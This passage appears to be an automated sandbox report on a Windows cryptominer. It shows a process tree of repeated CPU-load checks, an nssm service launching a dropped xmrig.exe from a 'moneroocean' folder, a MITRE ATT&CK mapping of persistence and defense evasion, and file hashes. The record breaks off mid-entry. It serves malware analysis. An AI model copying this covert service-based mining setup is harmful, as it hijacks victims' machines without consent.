    3⤵
    PID:4616
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4844
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3216
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2156
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4268
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4680
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2232
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3980
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4588
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4072
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1432
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4484
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1784
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2512
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4712
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4236
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:756
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2480
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3128
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3576
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:632
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2460
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2532
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:5036
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2600
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3196
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:5052
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4100
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4316
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3420
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4704
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2424
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1560
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:916
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4852
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4856
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2008
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4564
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2528
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4180
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3372
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4008
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3460
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1392
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4376
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4604
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1292
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:424
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4288
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4832
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2516
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4228
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2384
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4540
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4400
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2960
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1204
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:212
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:820
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:592
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3692
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4544
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2540
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4252
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3216
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2472
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3356
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4680
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3980
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4752
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4588
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1432
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:5024
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4484
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2512
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2864
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2844
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4996
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1144
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4560
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2480
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2236
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4260
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2928
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1036
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4412
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:5036
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:5056
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2596
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:5052
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2952
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2324
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2248
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4704
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2712
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:916
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2720
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2716
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2008
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1540
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:560
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4180
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4076
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3676
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2428
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4008
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3580
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:5064
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4376
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2068
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3544
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:424
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:504
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4012
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4156
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3496
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4400
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2544
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4644
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:212
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4396
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1440
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4652
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:592
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1664
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3216
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2232
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1832
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3484
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1780
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3000
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:764
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:816
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3360
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4392
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2864
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3844
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2108
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2256
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1380
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3672
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4768
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4800
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1036
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2052
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1044
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:5056
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1104
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4700
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2284
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:5052

C:\Users\Admin\moneroocean\nssm.exe
C:\Users\Admin\moneroocean\nssm.exe
1⤵
- Executes dropped EXE
PID:1792
- C:\Users\Admin\moneroocean\xmrig.exe
  "C:\Users\Admin\moneroocean\xmrig.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  PID:3016

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
56efdb5a0f10b5eece165de4f8c9d799

SHA1
fa5de7ca343b018c3bfeab692545eb544c244e16

SHA256
6c4e3fefc4faa1876a72c0964373c5fa08d3ab074eec7b1313b3e8410b9cb108

SHA512
91e50779bbae7013c492ea48211d6b181175bfed38bf4b451925d5812e887c555528502316bbd4c4ab1f21693d77b700c44786429f88f60f7d92f21e46ea5ddc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
8b448685260a02a43da62bce4327e347

SHA1
f2168542c6c4a3bb3fdc184aa6d648a1de6e601d

SHA256
0dff0f29ba71cce6b381a9b1af67910897fa34936fe70e8593736be28ec3fc20

SHA512
1897b23337b361cf0729229a060275a872159f0eae67979d6e4c333e93b26a00be1d409c9582a214cc31a72ef80a26e1eb15f5561fbacb2742213f8e289ef543

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
563ca5a07929c2625c37d612d6f26cf4

SHA1
68d6f7f9260f8acaf80c6452a13b77ae33201a76

SHA256
a9de68684bca245dd61aac8eb9667e4869815b7d74229c660f2dd3d29f2ddafe

SHA512
f568f364a6045eb88ece18e8188837afe61ab071c543c51ace3f6c7d0d00483685752226bb5725f2fcc268e97219ea70ef667e6a853a955222700194a7693303

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
5020cbe62a7e77dc404df2f703f2ba94

SHA1
2e3a5d70f8338322eb5131051a996076d7be401a

SHA256
4444918720d0e36bf1a35798cbcb62b505d72afa61c23bca0598c4b65a5ef27b

SHA512
28aa8ab8b025bcd0adc8e87bb918f7b23718c03608860f779ae2b754489ad5a7a2df3f627ee8706688012b189e4079fbf482c05d55acb8ee2e30704109e4c487

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
5086727383913b09209815c52269d638

SHA1
f367fd9d0f29826cc9533224686eef4b470eabb9

SHA256
6c42373c356ddc3d75daafb1e8791f4fb9656ca8ced2fde868422e8cb5b1f303

SHA512
97722d47a2a53a22abc202a0aa0e002ddd9c3458fa47813d725b73fc3902c2fc777ae78a5d2a0365569f4baf35f38f3efd02ace84553fb526ef76e0fa4e41e0d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
758ca1c0e88f880415781f333f557193

SHA1
55614bff279cc72232c448650326297671337259

SHA256
667ce0396feb456d50ff5fc7618a535c6c82e23d15932e6af2ac604a62b8448e

SHA512
afd7bc6f939fbcd553422da5dd67de48a44dd5afc96cb2b64fff2c54dffa710bb100f63b75c1d55ae6b1db31bbb67b8dcedb2072b671cad6c64abd80c7011971

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
20adbd68de4828876c251806de354795

SHA1
322f3a420d5cd43f8b0bf9f58b1cd0c245257433

SHA256
9087cdb6b13c9e46b93cc216c440a51a2dc15f912aa0cf76abea468afd697b88

SHA512
39b7a7e426aa1790ab7415f697520de9bc819c43a705334cf21a7d983d05eeaa58ab61e2f297c7977c1f6381a429dc588c674a1d7df0c0218c383ab707c7c5ef

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
2e92e5de02a7727abad9a5a080830f47

SHA1
f46626ed3d26d792ac35af599fe75b62c78f4eeb

SHA256
7241eda6ab6f9ce2162ba9e87ea27fa48167450d5c8a346c4dc784a547179f24

SHA512
217fb2b39e8ed81faeaafaf415922b3f5ddf2949f5d7bd6740408ff7f6f308f7252efbc0bcb0b0a133edacef8d3abbfa4550cc839dfd3d114d5eb4ad49c3a6ee

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
43399f75792f32cdd9523b29b130de02

SHA1
384a3532918e91eb0790990b66a7e2609c876754

SHA256
6503edc181df9703a44ce0a1b14f3b04d71f504cf9b50c1f1068983199d0b608

SHA512
ca5d61a4b824b5fdd11cee2b5f11a02ba55f7abc3755043eb269ab04641495724ddafd4da7ecb944539dc85da36309971bbdd8b49547f87c7e5461cde352e91a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
e0790e837f513658fbffa31cb9bbbf67

SHA1
d8e2d99cae8e5baa779c9846e0ee228115c1a695

SHA256
584d7d74c377ad620bc390b2f239e8dc2433728e7bb8c7ed24e70da25688698a

SHA512
6b2c8295aa57f130829d325f54211438f5ace06828c1c83ed690d255097d3de29804f23a28706b7b9515ce6e2ee9a1cc76b80d1a68e7692e510cf3f7c66cce0d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
5014adacd18e2c0d0d774742e0d60ad9

SHA1
3aaabf1d6562b9220f74169a7b6c3c656677a1ed

SHA256
5e1f9467f4a6d81bb58e0481ab769b61edc7600184a8be6c4b62aef34641078e

SHA512
3166adbd40a15a60a2f05cf5bd48df57508ac89fc99d3edb583ce31b817ed27594550bd17bd0cead84e21179aadd94711f1c4d8a9c0a0c9d185610e316e34097

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
493B

MD5
e5cf746167baac2e9670d92028b8e5be

SHA1
bd5354dcbcdee5884cdb09d78c6767f9108c16b1

SHA256
bcde53cf9027ac12bdea237da6db52d269fd861124e9a2e419eda15c5691b2a5

SHA512
10fa2c2d5c73fc7cee7cf1858430ab2be6079ae49b28020df1d5504d83cb0024ddd6e1c4569204306b63be6f413716e2b9c7195165f039465e5a2b0d7a6dd60a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
a416001a7be67388325fe9ec28cc8519

SHA1
9058399f7bd48ad1a46893761d08ac01d8003079

SHA256
2a7c6e3aeb3140ca60df3a3fe17a131fa701cb622dffe5b24d56289e322f2185

SHA512
279b99ebee47879b7ac00ef057bc4aa58c81f8dbdff3640a4c1c0fb859f6724f4b688dd5fbb0236b6f47c57c8012f46969464dfa6705a08d7d4d1ad4b403a82c

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1z5q1g5j.occ.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp6496.tmp.bat

Filesize
14KB

MD5
623f6006f683afdb4b7406e3a4ec35bf

SHA1
f63f03d7338317224726eba368f1a045fa2142d7

SHA256
21d6e0b0e8135a929a77f48e00d286bfa4fc2d749a61529e559b8a5ceb63e47b

SHA512
df7ae1e436be99bbf9ec7fe1fb745c9e2dba6b99e24019b5b1f78786198f1aed465575a829e9b8141bc92f0a4c4269e140228b4335f9fa724a60f1330ad6d3ab

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
d4f8a13f8c90e2b3b2e7d30a553df39c

SHA1
5c5303ef682ffcd31e57d1abd900ba5b637d51e4

SHA256
f7fc5b53e709adc1f4116ff47656f7262d7fb2859a100b3e3a5568453485649a

SHA512
68b0b59a732fecc8b345fa0429039d36bc3031ab65198e4d3783a5c16fa768bb6562131c1db58d00ad9c4af7fd8d77aed3c2150930663280a6bbd635ba5831bd

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
c9ef9c214996db3d88f571226910c5d5

SHA1
420ba30247b1e09f706557a7704a1ebee5d3165c

SHA256
fa55a24dccbf28309642d958cbb73f5053e3a56baa0eda22d4581e0151f5f7c1

SHA512
de91ef4268e67c4fa8d7216637bd9ca69ea33b108352675c954d4719d2d58b9414df78c6ebc8f622fcfbeda4ad5f981c2a17a48f7eeae8626cefe5b6894ec68d

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
67099c11aee7715195c370daf8713cf6

SHA1
4ffe1365749d5828225c3c91efbf37524f6b4574

SHA256
91a469ac7711ea2098eeed42b648548c51a109b83fd54fac53b643a4d9f127c8

SHA512
4a4351749e0a6dfb211196af3eb892486c3df501ec6923cad96c16605e40cca3febaf908ece586e36a55b2945141140c18c0359badd0d609999aed747221145b

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
e3b9b22db047eeacf220bc3b9c7f4eb2

SHA1
3b32a79bfde5b7860537e969a65c9ce854794efb

SHA256
5ef97aec367578d4ef6954f09f3ad4db6bb92d74dd08db7452c9e7bda32327d4

SHA512
0f9f534bcf09077b826fee22bfcdb24cdef734ab10f903687107b28b28c2e45cfa72655ae5716561a4b2aade574595a373f27df380792aa7bec3281056ab7d27

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
4641acb2e29a86e2d55b458bf33a61c1

SHA1
3c778199e577a39309543bdc03eeaaa882212078

SHA256
c39e1d3ff23f46571a1351c699ae34c2241fb13502e54ea1be260a4a7ebfef98

SHA512
534ea9c986d8972582fa342e7e43f3c9c41648d0a50703ebe5a7f6ead860c0b4d58d2e0295e270f13987337cc575219d0f9a08878ab0ef8c984b3aa6fc27e133

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
b4b33906bc4b2b8838193e319e5a2bda

SHA1
94da734b50d6da108046a6e2de0c6373936569cc

SHA256
2ed313169720b7a93a4c299aa27eec39c0cf24834280c64d71eff5d62730b750

SHA512
26de0639d125b2db8315dc52719a10d6ce22e1b5fa78f4eff3689d0dc71a4d1f5ed135fa7fff283c9f1758d765e943596e8ca1990b113446e3abc3575a13d1ff

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
bd812645c6d52a2607d52ad798b7ce8a

SHA1
1aeb5d64422fa6b4694e7bb1f380733748d0133a

SHA256
3c96e2be85e5ebad03c4c48e32a1e217ea64076e6d9e25611aa5572553f8a0ce

SHA512
7be58a3c179ba4a46ccd203f23ae39cdf5f94354f92d4073a063f91907a3db67106874dc7c5c4b1739bf6bf77e3d66c002c0ee10fb911a9b6d5354f9c58ebd65

Download Submit
C:\Users\Admin\moneroocean\nssm.exe

Filesize
360KB

MD5
1136efb1a46d1f2d508162387f30dc4d

SHA1
f280858dcfefabc1a9a006a57f6b266a5d1fde8e

SHA256
eee9c44c29c2be011f1f1e43bb8c3fca888cb81053022ec5a0060035de16d848

SHA512
43b31f600196eaf05e1a40d7a6e14d4c48fc6e55aca32c641086f31d6272d4afb294a1d214e071d5a8cce683a4a88b66a6914d969b40cec55ad88fde4077d3f5

Download Submit
C:\Users\Admin\moneroocean\xmrig.exe

Filesize
9.0MB

MD5
9ee2c39700819e5daab85785cac24ae1

SHA1
9b5156697983b2bdbc4fff0607fadbfda30c9b3b

SHA256
e7c13a06672837a2ae40c21b4a1c8080d019d958c4a3d44507283189f91842e3

SHA512
47d81ff829970c903f15a791b2c31cb0c6f9ed45fdb1f329c786ee21b0d1d6cd2099edb9f930824caceffcc936e222503a0e2c7c6253718a65a5239c6c88b649

Download Submit
C:\Users\Admin\nssm.zip

Filesize
135KB

MD5
